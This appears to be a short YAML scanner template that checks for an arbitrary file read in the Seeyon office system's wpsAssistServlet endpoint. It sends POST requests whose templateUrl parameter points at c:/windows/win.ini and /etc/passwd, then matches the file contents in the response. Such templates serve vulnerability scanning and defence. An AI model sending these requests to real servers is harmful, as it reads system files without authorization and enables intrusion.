name: seeyon-wpsassistservlet-fileread
groups:
  rules1:
    - method: POST
      path: "/seeyon/wpsAssistServlet"
      body: 
        flag=template&templateUrl=c:/windows/win.ini
      expression: |
        response.status == 200 && response.body.bcontains(b"bit app support") && response.body.bcontains(b"fonts") && response.body.bcontains(b"extensions")
  rules2:
    - method: POST
      path: "/seeyon/wpsAssistServlet"
      body: 
        flag=template&templateUrl=/etc/passwd
      expression: |
        response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
detail:
  author: 666